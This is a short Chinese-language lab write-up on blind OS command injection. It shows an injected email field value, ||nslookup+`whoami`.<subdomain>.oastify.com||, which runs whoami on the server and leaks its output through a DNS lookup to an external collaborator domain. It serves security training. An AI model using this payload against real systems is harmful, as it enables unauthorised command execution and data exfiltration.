# OS command injection Lab5 這題上一題的進階版,不只要觸發命令,還要把 whoami 的輸出結果偷渡出來。 先進入網站然後攔截請求。 ![image](https://hackmd.io/_uploads/H1GHs4CNel.png) ![image](https://hackmd.io/_uploads/rklwjNA4ll.png) 本提要發送 DNS,所以我們先去拿我們的子網域。 ``` 6597gkxmsqylh4qyxj7juuspdgj77zvo.oastify.com ``` 接著回來我們攔截的請求中,加上我們剛剛複製的子網域。 ![image](https://hackmd.io/_uploads/B1ojzF0Nee.png) ``` email=||nslookup+`whoami`.6597gkxmsqylh4qyxj7juuspdgj77zvo.oastify.com|| ``` :::info ### 為什麼用 nslookup? 因為 nslookup(或 ping)會觸發一個 DNS 查詢,是最常見、最穩定的 OAST 利用方式,即便伺服器不允許回傳任何資料,我們也能偵測這個「外部互動」。 ::: 現在去看看我們的 DNS。 ![image](https://hackmd.io/_uploads/ByBhVYA4gl.png) 將剛剛得到的資訊送去給 Lab 中的答案框。 ![image](https://hackmd.io/_uploads/Hkvi4tC4xg.png) ![image](https://hackmd.io/_uploads/Sy9CEKCEee.png) ---